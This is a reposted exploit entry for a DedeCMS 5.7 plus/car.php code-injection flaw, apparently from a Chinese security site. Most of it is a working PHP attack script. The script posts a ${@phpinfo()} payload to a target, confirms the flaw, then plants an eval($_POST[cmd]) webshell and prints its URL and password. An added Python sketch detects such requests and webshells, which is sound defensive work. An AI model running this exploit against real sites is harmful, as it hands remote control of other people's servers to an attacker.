DedeCMS (织梦) 5.7 /plus/car.php SQL injection 0day

Test method:

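The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only. Use at your own risk!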
    <?php
    $host=$argv[1];
    $path=$argv[2];
    $path=$path."plus/car.php";
    $url=$path;
    if(count($argv)<3){
    print_r('
    Usage: php '.$argv[0].' host path
    Example:
    php '.$argv[0].' www.site.com /dede/
    作者:舞林 http://t.qq.com/wulinlw
    修改:小逸
    ');
    exit;
    }
    $data='$a=${@phpinfo()};';
    $buffer = POST($host,80,$url,$data,30);
    preg_match("/allow_url_fopen/i", $buffer, $arr_suc);

    $str="allow_url_fopen";
    if($arr_suc[0]==$str){
        echo "Congratulations,target exist this bug. ";
        $data='$a=${@file_put_contents("dst.php","<?php eval($_POST[cmd]); ?>")};';
        $buffer = POST($host,80,$url,$data,30);
        echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
    }
    else {
        echo "Sorry,target may not exist this bug.";
        exit;
    }
    function POST($host,$port,$path,$data,$timeout, $cookie='') {
        $buffer='';
        $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
        if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
        else {
            fputs($fp, "POST $path HTTP/1.0 ");
            fputs($fp, "Host: $host ");
            fputs($fp, "Content-type: application/x-www-form-urlencoded ");
            fputs($fp, "Content-length: ".strlen($data)." ");
            fputs($fp, "Connection: close ");
            fputs($fp, $data." ");

            while(!feof($fp))
            {
                $buffer .= fgets($fp,4096);
            }
            fclose($fp);
        }
        return $buffer;
    }
    ?>
Source: http://sebug.net/vuldb/ssvid-60162
Original article: https://www.cnblogs.com/milantgh/p/3615919.html
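
For defenders, the PoC above leaves two matchable artifacts: a POST to plus/car.php whose body carries PHP `${...}` call syntax, and a dropped file that passes request input to `eval`. The Python sketch below is an added example, not part of the original post or the Sebug entry; the function names, sample requests and sample file contents are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# PHP "complex variable" syntax wrapping a function call, e.g. ${@phpinfo()}
INJECTION_RE = re.compile(r"\$\{\s*@?\s*[A-Za-z_\\][\w\\]*\s*\(")
# One-line webshell of the kind the PoC writes: eval()/assert() fed from request input
WEBSHELL_RE = re.compile(
    r"\b(?:eval|assert)\s*\(\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)
TARGET_SUFFIX = "/plus/car.php"

def fully_decode(body, max_rounds=3):
    """URL-decode repeatedly so single- and double-encoded payloads look alike."""
    for _ in range(max_rounds):
        decoded = unquote_plus(body)
        if decoded == body:
            break
        body = decoded
    return body

def is_suspicious_request(method, path, body):
    """True for a POST to plus/car.php whose body contains ${...func(...)}."""
    clean_path = path.split("?", 1)[0].lower()
    if method.upper() != "POST" or not clean_path.endswith(TARGET_SUFFIX):
        return False
    return bool(INJECTION_RE.search(fully_decode(body)))

def looks_like_webshell(source):
    """True if PHP source evaluates request input directly."""
    return bool(WEBSHELL_RE.search(source))

# Constructed sample data (not taken from real traffic or a real webroot)
SAMPLE_REQUESTS = [
    ("POST", "/dede/plus/car.php", "$a=${@phpinfo()};"),
    ("POST", "/dede/plus/car.php", "%24a%3D%24%7B%40phpinfo%28%29%7D%3B"),
    ("POST", "/dede/plus/car.php", "id=12&num=1"),
    ("GET", "/dede/plus/car.php", ""),
]
SAMPLE_FILES = {
    "plus/dst.php": "<?php eval($_POST[cmd]); ?>",
    "plus/list.php": "<?php echo htmlspecialchars($_GET['id']); ?>",
}

def scan():
    """Return (flagged requests, flagged file names) for the sample data."""
    hits = [r for r in SAMPLE_REQUESTS if is_suspicious_request(*r)]
    shells = sorted(n for n, src in SAMPLE_FILES.items() if looks_like_webshell(src))
    return hits, shells

if __name__ == "__main__":
    print(scan())
```

Request bodies are not present in default access logs, so the request check needs a WAF, reverse proxy or audit log that records POST bodies.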